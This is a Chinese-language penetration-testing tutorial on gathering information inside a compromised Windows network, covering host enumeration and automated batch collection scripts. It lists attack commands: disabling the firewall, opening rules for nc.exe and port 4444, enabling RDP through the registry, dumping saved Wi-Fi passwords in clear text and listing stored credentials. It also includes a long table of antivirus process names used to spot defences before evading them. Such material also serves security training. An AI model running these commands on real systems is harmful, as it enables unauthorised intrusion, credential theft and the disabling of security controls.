内网信息收集

1. 内网信息收集

• 内网信息收集概述
• 手动收集本机信息
• 自动收集本地信息
• 内网IP扫面技术
• 内网端口扫描技术
• 域内基础信息收集
• 查找域控制器
• 查找域内用户信息
• 查找域管理员
• 查找域管理进程
• powershell收集域内信息
• 敏感数据定位

攻击流程

2. 手动收集本机信息

内网本地信息收集

不管是在外网中还是在内网中,信息收集都是重要的第一步。对于内网中的一台机器,其所处内网的结构是什么样 的、其角色是什么、使用这台机器的人的角色是什么,以及这台机器上安装了什么杀毒软件、这台机器是通过什么方 式上网的、这台机器是笔记本电脑还是台式机等问题,都需要通过信息收集来解答。

网络配置信息

获取本机的网络配置信息

ipconfig

操作系统和软件信息

查询操作系统和版本信息

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" systeminfo| findstr /B /C:"OS 名称" /C:"OS 版本"

查看系统体系结构

echo %PROCESSOR_ARCHITECTURE% 

查看安装的软件及版本

wmic product get name,version 
powershell "Get‐WmiObject ‐class win32_product | Select‐Object ‐Property name,version" 

本机服务信息

进程信息

tasklist 
wmic process list brief

启动程序信息

wmic startup get command,caption 

计划任务信息

如果出现无法加载列资源 输入：chcp 437

schtasks /query /fo LIST /v

主机开机时间信息

net statistics workstation

用户列表信息

net user 
wmic useraccount get name ,SID 

列出会话

net session 

查询端口列表

netstat ‐ano 

查看补丁列表

systeminfo 
wmic qfe get Caption,Description,HotFixID,InstalledOn 

查询共享列表

net share 
wmic share get name,path,status 

路由信息

route print

防火墙相关操作

1、查看防火墙是否开启

netsh firewall show state 

2、关闭防火墙

Windows server 2003:     netsh firewall set opmode disable 
Windows server 2003之后:  netsh firewall set opmode disable 或者netsh advfirewall set allprofiles  state off 

3、查看防火墙配置

netsh firewall show config 

4、修改防火墙配置

2003及之前的版本,允许指定的程序进行全部的连接：

netsh firewall add allowedprogram c:\nc.exe "allownc" enable

2003之后的版本，允许指定的程序进行全部的连接

netsh advfirewall firewall add rule name="pass nc"dir=in action=allow program="C:\nc.exe" 

允许指定程序退出,命令如下

netsh advfirewall firewall add rule name="Allownc" dir=out action=allow program="C: \nc.exe" 

允许3389端口放行,命令如下

netsh advfirewall firewall add rule name="RemoteDesktop" protocol=TCP dir=in localport=3389  action=allow 

4444端口

netsh advfirewall firewall add rule name=test dir=in action=allow protocol=tcp localport=4444	#允许4444端口进站  
netsh advfirewall firewall add rule name=test dir=in action=allow program=c:\a.exe  			#允许a.exe进 站   
netsh advfirewall firewall add rule name=test dir=out action=allow protocol=tcp localport=4444	#允许4444端口出站  
netsh advfirewall firewall add rule name=test dir=out action=allow  program=c:\a.exe	#允许a.exe出站 

开启远程服务

1、在2003机器上

wmic path win32_terminalservicesetting where (_CLASS !="") call setallowtsconnections 1

2、在server2008和server 2021

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t  REG_DWORD /d 00000000 /f  #开启 
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t  REG_DWORD /d 11111111 /f  #关闭 

WIFI密码收集

for /f  "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles')  do  @echo %j | findstr  ‐i ‐v echo |  netsh wlan show profiles %j key=clear

查询RDP端口

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP‐ Tcp" /V PortNumber

0xd3d即为3389端口

查看代理配置信息

reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

查看当前保存的登陆凭证

cmdkey /l 

Arp信息

arp ‐a 

查看最近打开的文档

dir %APPDATA%\Microsoft\Windows\Recent

查询本机用户组

net localgroup 

管理员组成员列表

net localgroup administrators

RDP凭证

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\* 

杀毒软件查询

wmic /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get displayname  /format:list

avList = {

“360tray.exe”: “360安全卫士‐实时保护”,

“360safe.exe”: “360安全卫士‐主程序”,

“ZhuDongFangYu.exe”: “360安全卫士‐主动防御”,

“360sd.exe”: “360杀毒”,

“a2guard.exe”: “a‐squared杀毒”,

“ad‐watch.exe”: “Lavasoft杀毒”,

“cleaner8.exe”: “The Cleaner杀毒”,

“vba32lder.exe”: “vb32杀毒”,

“MongoosaGUI.exe”: “Mongoosa杀毒”, “CorantiControlCenter32.exe”: “Coranti2012杀毒”,

“F‐PROT.exe”: “F‐Prot AntiVirus”,

“CMCTrayIcon.exe”: “CMC杀毒”,

“K7TSecurity.exe”: “K7杀毒”,

“UnThreat.exe”: “UnThreat杀毒”, “CKSoftShiedAntivirus4.exe”: “Shield Antivirus杀毒”, “AVWatchService.exe”: “VIRUSfighter杀毒”, “ArcaTasksService.exe”: “ArcaVir杀毒”,

“iptray.exe”: “Immunet杀毒”,

“PSafeSysTray.exe”: “PSafe杀毒”,

“nspupsvc.exe”: “nProtect杀毒”, “SpywareTerminatorShield.exe”: “SpywareTerminator反间谍软件”, “BKavService.exe”: “Bkav杀毒”,

“MsMpEng.exe”: “Microsoft Security Essentials”, “SBAMSvc.exe”: “VIPRE”,

“ccSvcHst.exe”: “Norton杀毒”,

“f‐secure.exe”: “冰岛”,

“avp.exe”: “Kaspersky”,

“KvMonXP.exe”: “江民杀毒”,

“RavMonD.exe”: “瑞星杀毒”,

“Mcshield.exe”: “McAfee”,

“Tbmon.exe”: “McAfee”,

“Frameworkservice.exe”: “McAfee”,

“egui.exe”: “ESET NOD32”,

“ekrn.exe”: “ESET NOD32”,

“eguiProxy.exe”: “ESET NOD32”,

“kxetray.exe”: “金山毒霸”,

“knsdtray.exe”: “可牛杀毒”,

“TMBMSRV.exe”: “趋势杀毒”,

“avcenter.exe”: “Avira(小红伞)”,

“avguard.exe”: “Avira(小红伞)”,

“avgnt.exe”: “Avira(小红伞)”,

“sched.exe”: “Avira(小红伞)”,

“ashDisp.exe”: “Avast网络安全”,

“rtvscan.exe”: “诺顿杀毒”,

“ccapp.exe”: “SymantecNorton”,

“NPFMntor.exe”: “Norton杀毒软件”,

“ccSetMgr.exe”: “赛门铁克”,

“ccRegVfy.exe”: “Norton杀毒软件”,

“ksafe.exe”: “金山卫士”,

“QQPCRTP.exe”: “QQ电脑管家”,

“avgwdsvc.exe”: “AVG杀毒”,

“QUHLPSVC.exe”: “QUICK HEAL杀毒”,

“mssecess.exe”: “微软杀毒”,

“SavProgress.exe”: “Sophos杀毒”,

“SophosUI.exe”: “Sophos杀毒”,

“SophosFS.exe”: “Sophos杀毒”,

“SophosHealth.exe”: “Sophos杀毒”, “SophosSafestore64.exe”: “Sophos杀毒”,

“SophosCleanM.exe”: “Sophos杀毒”,

“fsavgui.exe”: “F‐Secure杀毒”,

“vsserv.exe”: “比特梵德”,

“remupd.exe”: “熊猫卫士”,

“FortiTray.exe”: “飞塔”,

“safedog.exe”: “安全狗”,

“parmor.exe”: “木马克星”,

“Iparmor.exe.exe”: “木马克星”,

“beikesan.exe”: “贝壳云安全”,

“KSWebShield.exe”: “金山网盾”,

“TrojanHunter.exe”: “木马猎手”,

“GG.exe”: “巨盾网游安全盾”,

“adam.exe”: “绿鹰安全精灵”,

“AST.exe”: “超级巡警”,

“ananwidget.exe”: “墨者安全专家”,

“AVK.exe”: “AntiVirusKit”,

“avg.exe”: “AVG Anti‐Virus”,

“spidernt.exe”: “Dr.web”,

“avgaurd.exe”: “Avira Antivir”,

“vsmon.exe”: “Zone Alarm”,

“cpf.exe”: “Comodo”,

“outpost.exe”: “Outpost Firewall”,

“rfwmain.exe”: “瑞星防火墙”,

“kpfwtray.exe”: “金山网镖”,

“FYFireWall.exe”: “风云防火墙”,

“MPMon.exe”: “微点主动防御”,

“pfw.exe”: “天网防火墙”,

“BaiduSdSvc.exe”: “百度杀毒‐服务进程”,

“BaiduSdTray.exe”: “百度杀毒‐托盘进程”,

“BaiduSd.exe”: “百度杀毒‐主程序”,

“SafeDogGuardCenter.exe”: “安全狗”, “safedogupdatecenter.exe”: “安全狗”, “safedogguardcenter.exe”: “安全狗”,

“SafeDogSiteIIS.exe”: “安全狗”,

“SafeDogTray.exe”: “安全狗”,

“SafeDogServerUI.exe”: “安全狗”,

“D_Safe_Manage.exe”: “D盾”,

“d_manage.exe”: “D盾”,

“yunsuo_agent_service.exe”: “云锁”, “yunsuo_agent_daemon.exe”: “云锁”,

“HwsPanel.exe”: “护卫神”,

“hws_ui.exe”: “护卫神”,

“hws.exe”: “护卫神”,

“hwsd.exe”: “护卫神”,

“hipstray.exe”: “火绒”,

“wsctrl.exe”: “火绒”,

“usysdiag.exe”: “火绒”,

“SPHINX.exe”: “SPHINX防火墙”,

“bddownloader.exe”: “百度卫士”,

“baiduansvx.exe”: “百度卫士‐主进程”,

“AvastUI.exe”: “Avast!5主程序”,

“emet_agent.exe”: “EMET”,

“emet_service.exe”: “EMET”,

“firesvc.exe”: “McAfee”,

“firetray.exe”: “McAfee”,

“hipsvc.exe”: “McAfee”,

“mfevtps.exe”: “McAfee”,

“mcafeefire.exe”: “McAfee”,

“scan32.exe”: “McAfee”,

“shstat.exe”: “McAfee”,

“vstskmgr.exe”: “McAfee”,

“engineserver.exe”: “McAfee”,

“mfeann.exe”: “McAfee”,

“mcscript.exe”: “McAfee”,

“updaterui.exe”: “McAfee”,

“udaterui.exe”: “McAfee”,

“naprdmgr.exe”: “McAfee”,

“cleanup.exe”: “McAfee”,

“cmdagent.exe”: “McAfee”,

“frminst.exe”: “McAfee”,

“mcscript_inuse.exe”: “McAfee”,

“mctray.exe”: “McAfee”,

“_avp32.exe”: “卡巴斯基”,

“_avpcc.exe”: “卡巴斯基”,

“_avpm.exe”: “卡巴斯基”,

“aAvgApi.exe”: “AVG”,

“ackwin32.exe”: “已知杀软进程,名称暂未收录”,

“alertsvc.exe”: “Norton AntiVirus”,

“alogserv.exe”: “McAfee VirusScan”,

“anti‐trojan.exe”: “Anti‐Trojan Elite”,

“arr.exe”: “Application Request Route”,

“atguard.exe”: “AntiVir”,

“atupdater.exe”: “已知杀软进程,名称暂未收录”,

“atwatch.exe”: “Mustek”,

“au.exe”: “NSIS”,

“aupdate.exe”: “Symantec”,

“auto‐protect.nav80try.exe”: “已知杀软进程,名称暂未收录”, “autodown.exe”: “AntiVirus AutoUpdater”,

“avconsol.exe”: “McAfee”,

“avgcc32.exe”: “AVG”,

“avgctrl.exe”: “AVG”,

“avgemc.exe”: “AVG”,

“avgrsx.exe”: “AVG”,

“avgserv.exe”: “AVG”,

“avgserv9.exe”: “AVG”,

“avgw.exe”: “AVG”,

“avkpop.exe”: “G DATA SOFTWARE AG”,

“avkserv.exe”: “G DATA SOFTWARE AG”,

“avkservice.exe”: “G DATA SOFTWARE AG”,

“avkwctl9.exe”: “G DATA SOFTWARE AG”,

“avltmain.exe”: “Panda Software Aplication”,

“avnt.exe”: “H+BEDV Datentechnik GmbH”,

“avp32.exe”: “Kaspersky Anti‐Virus”,

“avpcc.exe”: “ Kaspersky AntiVirus”,

“avpdos32.exe”: “ Kaspersky AntiVirus”,

“avpm.exe”: “ Kaspersky AntiVirus”,

“avptc32.exe”: “ Kaspersky AntiVirus”,

“avpupd.exe”: “ Kaspersky AntiVirus”,

“avsynmgr.exe”: “McAfee”,

“avwin.exe”: “ H+BEDV”,

“bargains.exe”: “Exact Advertising SpyWare”, “beagle.exe”: “Avast”,

“blackd.exe”: “BlackICE”,

“blackice.exe”: “BlackICE”,

“blink.exe”: “micromedia”,

“blss.exe”: “CBlaster”,

“bootwarn.exe”: “Symantec”,

“bpc.exe”: “Grokster”,

“brasil.exe”: “Exact Advertising”,

“ccevtmgr.exe”: “Norton Internet Security”,

“cdp.exe”: “CyberLink Corp.”,

“cfd.exe”: “Motive Communications”,

“cfgwiz.exe”: “ Norton AntiVirus”,

“claw95.exe”: “已知杀软进程,名称暂未收录”,

“claw95cf.exe”: “已知杀软进程,名称暂未收录”,

“clean.exe”: “windows流氓软件清理大师”,

“cleaner.exe”: “windows流氓软件清理大师”,

“cleaner3.exe”: “windows流氓软件清理大师”,

“cleanpc.exe”: “windows流氓软件清理大师”,

“cpd.exe”: “McAfee”,

“ctrl.exe”: “已知杀软进程,名称暂未收录”,

“cv.exe”: “已知杀软进程,名称暂未收录”,

“defalert.exe”: “Symantec”,

“defscangui.exe”: “Symantec”,

“defwatch.exe”: “Norton Antivirus”,

“doors.exe”: “已知杀软进程,名称暂未收录”,

“dpf.exe”: “已知杀软进程,名称暂未收录”,

“dpps2.exe”: “PanicWare”,

“dssagent.exe”: “Broderbund”,

“ecengine.exe”: “已知杀软进程,名称暂未收录”,

“emsw.exe”: “Alset Inc”,

“ent.exe”: “已知杀软进程,名称暂未收录”,

“espwatch.exe”: “已知杀软进程,名称暂未收录”,

“ethereal.exe”: “RationalClearCase”,

“exe.avxw.exe”: “已知杀软进程,名称暂未收录”,

“expert.exe”: “已知杀软进程,名称暂未收录”,

“f‐prot95.exe”: “已知杀软进程,名称暂未收录”,

“fameh32.exe”: “F‐Secure”,

“fast.exe”: “ FastUsr”,

“fch32.exe”: “F‐Secure”,

“fih32.exe”: “F‐Secure”,

“findviru.exe”: “F‐Secure”,

“firewall.exe”: “AshampooSoftware”,

“fnrb32.exe”: “F‐Secure”,

“fp‐win.exe”: “ F‐Prot Antivirus OnDemand”,

“fsaa.exe”: “F‐Secure”,

“fsav.exe”: “F‐Secure”,

“fsav32.exe”: “F‐Secure”,

“fsav530stbyb.exe”: “F‐Secure”,

“fsav530wtbyb.exe”: “F‐Secure”,

“fsav95.exe”: “F‐Secure”,

“fsgk32.exe”: “F‐Secure”,

“fsm32.exe”: “F‐Secure”,

“fsma32.exe”: “F‐Secure”,

“fsmb32.exe”: “F‐Secure”,

“gbmenu.exe”: “已知杀软进程,名称暂未收录”,

“guard.exe”: “ewido”,

“guarddog.exe”: “ewido”,

“htlog.exe”: “已知杀软进程,名称暂未收录”,

“htpatch.exe”: “Silicon Integrated Systems Corporation”, “hwpe.exe”: “已知杀软进程,名称暂未收录”,

“iamapp.exe”: “Symantec”,

“iamserv.exe”: “Symantec”,

“iamstats.exe”: “Symantec”,

“iedriver.exe”: “ Urlblaze.com”,

“iface.exe”: “Panda Antivirus Module”,

“infus.exe”: “Infus Dialer”,

“infwin.exe”: “Msviewparasite”,

“intdel.exe”: “Inet Delivery”,

“intren.exe”: “已知杀软进程,名称暂未收录”,

“jammer.exe”: “已知杀软进程,名称暂未收录”,

“kavpf.exe”: “Kapersky”,

“kazza.exe”: “Kapersky”,

“keenvalue.exe”: “EUNIVERSE INC”,

“launcher.exe”: “Intercort Systems”,

“ldpro.exe”: “已知杀软进程,名称暂未收录”,

“ldscan.exe”: “Windows Trojans Inspector”, “localnet.exe”: “已知杀软进程,名称暂未收录”,

“luall.exe”: “Symantec”,

“luau.exe”: “Symantec”,

“lucomserver.exe”: “Norton”,

“mcagent.exe”: “McAfee”,

“mcmnhdlr.exe”: “McAfee”,

“mctool.exe”: “McAfee”,

“mcupdate.exe”: “McAfee”,

“mcvsrte.exe”: “McAfee”,

“mcvsshld.exe”: “McAfee”,

“mfin32.exe”: “MyFreeInternetUpdate”,

“mfw2en.exe”: “MyFreeInternetUpdate”,

“mfweng3.02d30.exe”: “MyFreeInternetUpdate”, “mgavrtcl.exe”: “McAfee”,

“mgavrte.exe”: “McAfee”,

“mghtml.exe”: “McAfee”,

“mgui.exe”: “BullGuard”,

“minilog.exe”: “Zone Labs Inc”,

“mmod.exe”: “EzulaInc”,

“mostat.exe”: “WurldMediaInc”,

“mpfagent.exe”: “McAfee”,

“mpfservice.exe”: “McAfee”,

“mpftray.exe”: “McAfee”,

“mscache.exe”: “Integrated Search Technologies Spyware”, “mscman.exe”: “OdysseusMarketingInc”,

“msmgt.exe”: “Total Velocity Spyware”,

“msvxd.exe”: “W32/Datom‐A”,

“mwatch.exe”: “已知杀软进程,名称暂未收录”,

“nav.exe”: “Reuters Limited”,

“navapsvc.exe”: “Norton AntiVirus”,

“navapw32.exe”: “Norton AntiVirus”,

“navw32.exe”: “Norton Antivirus”,

“ndd32.exe”: “诺顿磁盘医生”,

“neowatchlog.exe”: “已知杀软进程,名称暂未收录”, “netutils.exe”: “已知杀软进程,名称暂未收录”,

“nisserv.exe”: “Norton”,

“nisum.exe”: “Norton”,

“nmain.exe”: “Norton”,

“nod32.exe”: “ESET Smart Security”, “norton_internet_secu_3.0_407.exe”: “已知杀软进程,名称暂未收录”, “notstart.exe”: “已知杀软进程,名称暂未收录”,

“nprotect.exe”: “Symantec”,

“npscheck.exe”: “Norton”,

“npssvc.exe”: “Norton”,

“ntrtscan.exe”: “趋势反病毒应用程序”,

“nui.exe”: “已知杀软进程,名称暂未收录”,

“otfix.exe”: “已知杀软进程,名称暂未收录”, “outpostinstall.exe”: “Outpost”,

“patch.exe”: “趋势科技”,

“pavw.exe”: “已知杀软进程,名称暂未收录”,

“pcscan.exe”: “趋势科技”,

“pdsetup.exe”: “已知杀软进程,名称暂未收录”,

“persfw.exe”: “Tiny Personal Firewall”,

“pgmonitr.exe”: “PromulGate SpyWare”,

“pingscan.exe”: “已知杀软进程,名称暂未收录”,

“platin.exe”: “已知杀软进程,名称暂未收录”,

“pop3trap.exe”: “PC‐cillin”,

“poproxy.exe”: “NortonAntiVirus”,

“popscan.exe”: “已知杀软进程,名称暂未收录”,

“powerscan.exe”: “Integrated Search Technologies”, “ppinupdt.exe”: “已知杀软进程,名称暂未收录”,

“pptbc.exe”: “已知杀软进程,名称暂未收录”,

“ppvstop.exe”: “已知杀软进程,名称暂未收录”, “prizesurfer.exe”: “Prizesurfer”,

“prmt.exe”: “OpiStat”,

“prmvr.exe”: “Adtomi”,

“processmonitor.exe”: “Sysinternals”,

“proport.exe”: “已知杀软进程,名称暂未收录”,

“protectx.exe”: “ProtectX”,

“pspf.exe”: “已知杀软进程,名称暂未收录”,

“purge.exe”: “已知杀软进程,名称暂未收录”,

“qconsole.exe”: “Norton AntiVirus Quarantine Console”, “qserver.exe”: “Norton Internet Security”,

“rapapp.exe”: “BlackICE”,

“rb32.exe”: “RapidBlaster”,

“rcsync.exe”: “PrizeSurfer”,

“realmon.exe”: “Realmon “,

“rescue.exe”: “已知杀软进程,名称暂未收录”,

“rescue32.exe”: “卡巴斯基互联网安全套装”,

“rshell.exe”: “已知杀软进程,名称暂未收录”,

“rtvscn95.exe”: “Real‐time virus scanner “, “rulaunch.exe”: “McAfee User Interface”,

“run32dll.exe”: “PAL PC Spy”,

“safeweb.exe”: “PSafe Tecnologia”,

“sbserv.exe”: “Norton Antivirus”,

“scrscan.exe”: “360杀毒”,

“sfc.exe”: “System file checker”,

“sh.exe”: “MKS Toolkit for Win3”,

“showbehind.exe”: “MicroSmarts Enterprise Component “, “soap.exe”: “System Soap Pro”,

“sofi.exe”: “已知杀软进程,名称暂未收录”,

“sperm.exe”: “已知杀软进程,名称暂未收录”,

“supporter5.exe”: “eScorcher反病毒”,

“symproxysvc.exe”: “Symantec”,

“symtray.exe”: “Symantec”,

“tbscan.exe”: “ThunderBYTE”,

“tc.exe”: “TimeCalende”,

“titanin.exe”: “TitanHide”,

“tvmd.exe”: “Total Velocity”,

“tvtmd.exe”: “ Total Velocity”,

“vettray.exe”: “eTrust”,

“vir‐help.exe”: “已知杀软进程,名称暂未收录”,

“vnpc3000.exe”: “已知杀软进程,名称暂未收录”,

“vpc32.exe”: “Symantec”,

“vpc42.exe”: “Symantec”,

“vshwin32.exe”: “McAfee”,

“vsmain.exe”: “McAfee”,

“vsstat.exe”: “McAfee”,

“wfindv32.exe”: “已知杀软进程,名称暂未收录”,

“zapro.exe”: “Zone Alarm”,

“zonealarm.exe”: “Zone Alarm”,

“AVPM.exe”: “Kaspersky”,

“A2CMD.exe”: “Emsisoft Anti‐Malware”,

“A2SERVICE.exe”: “a‐squared free”,

“A2FREE.exe”: “a‐squared Free”,

“ADVCHK.exe”: “Norton AntiVirus”,

“AGB.exe”: “安天防线”,

“AHPROCMONSERVER.exe”: “安天防线”,

“AIRDEFENSE.exe”: “AirDefense”,

“ALERTSVC.exe”: “Norton AntiVirus”,

“AVIRA.exe”: “小红伞杀毒”,

“AMON.exe”: “Tiny Personal Firewall”,

“AVZ.exe”: “AVZ”,

“ANTIVIR.exe”: “已知杀软进程,名称暂未收录”,

“APVXDWIN.exe”: “熊猫卫士”,

“ASHMAISV.exe”: “Alwil”,

“ASHSERV.exe”: “Avast Anti‐virus”,

“ASHSIMPL.exe”: “AVAST!VirusCleaner”,

“ASHWEBSV.exe”: “Avast”,

“ASWUPDSV.exe”: “Avast”,

“ASWSCAN.exe”: “Avast”,

“AVCIMAN.exe”: “熊猫卫士”,

“AVCONSOL.exe”: “McAfee”,

“AVENGINE.exe”: “熊猫卫士”,

“AVESVC.exe”: “Avira AntiVir Security Service”, “AVEVL32.exe”: “已知杀软进程,名称暂未收录”,

“AVGAM.exe”: “AVG”,

“AVGCC.exe”: “AVG”,

“AVGCHSVX.exe”: “AVG”,

“AVGCSRVX”: “AVG”,

“AVGNSX.exe”: “AVG”,

“AVGCC32.exe”: “AVG”,

“AVGCTRL.exe”: “AVG”,

“AVGEMC.exe”: “AVG”,

“AVGFWSRV.exe”: “AVG”,

“AVGNTMGR.exe”: “AVG”,

“AVGSERV.exe”: “AVG”,

“AVGTRAY.exe”: “AVG”,

“AVGUPSVC.exe”: “AVG”,

“AVINITNT.exe”: “Command AntiVirus for NT Server”, “AVPCC.exe”: “Kaspersky”,

“AVSERVER.exe”: “Kerio MailServer”,

“AVSCHED32.exe”: “H+BEDV”,

“AVSYNMGR.exe”: “McAfee”,

“AVWUPSRV.exe”: “H+BEDV”,

“BDSWITCH.exe”: “BitDefender Module”,

“BLACKD.exe”: “BlackICE”,

“CCEVTMGR.exe”: “Symantec”,

“CFP.exe”: “COMODO”,

“CLAMWIN.exe”: “ClamWin Portable”,

“CUREIT.exe”: “DrWeb CureIT”,

“DEFWATCH.exe”: “Norton Antivirus”,

“DRWADINS.exe”: “Dr.Web”,

“DRWEB.exe”: “Dr.Web”,

“DEFENDERDAEMON.exe”: “ShadowDefender”,

“EWIDOCTRL.exe”: “Ewido Security Suite”, “EZANTIVIRUSREGISTRATIONCHECK.exe”: “e‐Trust Antivirus”, “FIREWALL.exe”: “AshampooSoftware”,

“FPROTTRAY.exe”: “F‐PROT Antivirus”,

“FPWIN.exe”: “Verizon”,

“FRESHCLAM.exe”: “ClamAV”,

“FSAV32.exe”: “F‐Secure”,

“FSBWSYS.exe”: “F‐secure”,

“FSDFWD.exe”: “F‐Secure”,

“FSGK32.exe”: “F‐Secure”,

“FSGK32ST.exe”: “F‐Secure”,

“FSMA32.exe”: “F‐Secure”,

“FSMB32.exe”: “F‐Secure”,

“FSSM32.exe”: “F‐Secure”,

“GUARDGUI.exe”: “网游保镖”,

“GUARDNT.exe”: “IKARUS”,

“IAMAPP.exe”: “Symantec”,

“INOCIT.exe”: “eTrust”,

“INORPC.exe”: “eTrust”,

“INORT.exe”: “eTrust”,

“INOTASK.exe”: “eTrust”,

“INOUPTNG.exe”: “eTrust”,

“ISAFE.exe”: “eTrust”,

“KAV.exe”: “Kaspersky”,

“KAVMM.exe”: “Kaspersky”,

“KAVPF.exe”: “Kaspersky”,

“KAVPFW.exe”: “Kaspersky”,

“KAVSTART.exe”: “Kaspersky”,

“KAVSVC.exe”: “Kaspersky”,

“KAVSVCUI.exe”: “Kaspersky”,

“KMAILMON.exe”: “金山毒霸”,

“MCAGENT.exe”: “McAfee”,

“MCMNHDLR.exe”: “McAfee”,

“MCREGWIZ.exe”: “McAfee”,

“MCUPDATE.exe”: “McAfee”,

“MCVSSHLD.exe”: “McAfee”,

“MINILOG.exe”: “Zone Alarm”,

“MYAGTSVC.exe”: “McAfee”,

“MYAGTTRY.exe”: “McAfee”,

“NAVAPSVC.exe”: “Norton”,

“NAVAPW32.exe”: “Norton”,

“NAVLU32.exe”: “Norton”,

“NAVW32.exe”: “Norton Antivirus”,

“NEOWATCHLOG.exe”: “NeoWatch”,

“NEOWATCHTRAY.exe”: “NeoWatch”,

“NISSERV.exe”: “Norton”,

“NISUM.exe”: “Norton”,

“NMAIN.exe”: “Norton”,

“NOD32.exe”: “ESET NOD32”,

“NPFMSG.exe”: “Norman个人防火墙”,

“NPROTECT.exe”: “Symantec”,

“NSMDTR.exe”: “Norton”,

“NTRTSCAN.exe”: “趋势科技”,

“OFCPFWSVC.exe”: “OfficeScanNT”,

“ONLINENT.exe”: “已知杀软进程,名称暂未收录”,

“OP_MON.exe”: “ OutpostFirewall”,

“PAVFIRES.exe”: “熊猫卫士”,

“PAVFNSVR.exe”: “熊猫卫士”,

“PAVKRE.exe”: “熊猫卫士”,

“PAVPROT.exe”: “熊猫卫士”,

“PAVPROXY.exe”: “熊猫卫士”,

“PAVPRSRV.exe”: “熊猫卫士”,

“PAVSRV51.exe”: “熊猫卫士”,

“PAVSS.exe”: “熊猫卫士”,

“PCCGUIDE.exe”: “PC‐cillin”,

“PCCIOMON.exe”: “PC‐cillin”,

“PCCNTMON.exe”: “PC‐cillin”,

“PCCPFW.exe”: “趋势科技”,

“PCCTLCOM.exe”: “趋势科技”,

“PCTAV.exe”: “PC Tools AntiVirus”,

“PERSFW.exe”: “Tiny Personal Firewall”,

“PERVAC.exe”: “已知杀软进程,名称暂未收录”, “PESTPATROL.exe”: “Ikarus”,

“PREVSRV.exe”: “熊猫卫士”,

“RTVSCN95.exe”: “Real‐time Virus Scanner”, “SAVADMINSERVICE.exe”: “SAV”,

“SAVMAIN.exe”: “SAV”,

“SAVSCAN.exe”: “SAV”,

“SDHELP.exe”: “Spyware Doctor”,

“SHSTAT.exe”: “McAfee”,

“SPBBCSVC.exe”: “Symantec”,

“SPIDERCPL.exe”: “Dr.Web”,

“SPIDERML.exe”: “Dr.Web”,

“SPIDERUI.exe”: “Dr.Web”,

“SPYBOTSD.exe”: “Spybot “,

“SWAGENT.exe”: “SonicWALL”,

“SWDOCTOR.exe”: “SonicWALL”,

“SWNETSUP.exe”: “Sophos”,

“SYMLCSVC.exe”: “Symantec”,

“SYMPROXYSVC.exe”: “Symantec”,

“SYMSPORT.exe”: “Sysmantec”,

“SYMWSC.exe”: “Sysmantec”,

“SYNMGR.exe”: “Sysmantec”,

“TMLISTEN.exe”: “趋势科技”,

“TMNTSRV.exe”: “趋势科技”,

“TMPROXY.exe”: “趋势科技”,

“TNBUTIL.exe”: “Anti‐Virus”,

“VBA32ECM.exe”: “已知杀软进程,名称暂未收录”,

“VBA32IFS.exe”: “已知杀软进程,名称暂未收录”,

“VBA32PP3.exe”: “已知杀软进程,名称暂未收录”,

“VCRMON.exe”: “VirusChaser”,

“VRMONNT.exe”: “HAURI”,

“VRMONSVC.exe”: “HAURI”,

“VSHWIN32.exe”: “McAfee”,

“VSSTAT.exe”: “McAfee”,

“XCOMMSVR.exe”: “BitDefender”,

“ZONEALARM.exe”: “Zone Alarm”,

“360rp.exe”: “360杀毒”,

“afwServ.exe”: “ Avast Antivirus “,

“safeboxTray.exe”: “360杀毒”,

“360safebox.exe”: “360杀毒”,

“QQPCTray.exe”: “QQ电脑管家”,

“KSafeTray.exe”: “金山毒霸”,

“KSafeSvc.exe”: “金山毒霸”,

“KWatch.exe”: “金山毒霸”,

“gov_defence_service.exe”: “云锁”, “gov_defence_daemon.exe”: “云锁”,

“smartscreen.exe”: “Windows Defender”

};

3. 自动收集本地信息

bat脚本

echo 表示显示此命令后的字符
echo off 表示在此语句后所有运行的命令都不显示命令行本身
@与echo off相象，但它是加在每个命令行的最前面，表示运行时不显示这一行的命令行（只能影响当前行）。
call 调用另一个批处理文件（如果不用call而直接调用别的批处理文件，那么执行完那个批处理文件后将无法返回当前pause 运行此句会暂停批处理的执行并在屏幕上显示Press any key to continue...的提示，等待用户按任意键后继续rem 表示此命令后的字符为解释行（注释），不执行，只是给自己今后参考用的（相当于程序中的注释）。

@echo off		不显示后续命令行及当前命令行dir c:\*.* >a.txt	将c盘文件列表写入a.txt
call c:\ucdos\ucdos.bat	调 用 ucdos echo 你好		显示"你好"
pause	暂停,等待按键继续
rem 准备运行wps	注释：准备运行wps
cd ucdos	进入ucdos目录
wps	运行wps
echo 123 >1.txt	输出123到1.txt
echo 456 >>1.txt	追加456到1.txt

@echo off
echo #################### >>1.txt
ipconfig >>1.txt
echo  #################### >>1.txt
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" >>1.txt systeminfo| findstr /B /C:"OS 名称" /C:"OS 版本"	>>1.txt echo #################### >>1.txt
echo %PROCESSOR_ARCHITECTURE% >>1.txt

自动信息收集就是将之前讲的命令写成bat脚本运行，省去了我们手工的麻烦

其他脚本

以下的脚本帮助我们辅助完成工作

for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> ou wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html wmic netuse list full /format:"%var%" >> out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" > wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServiceP wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html

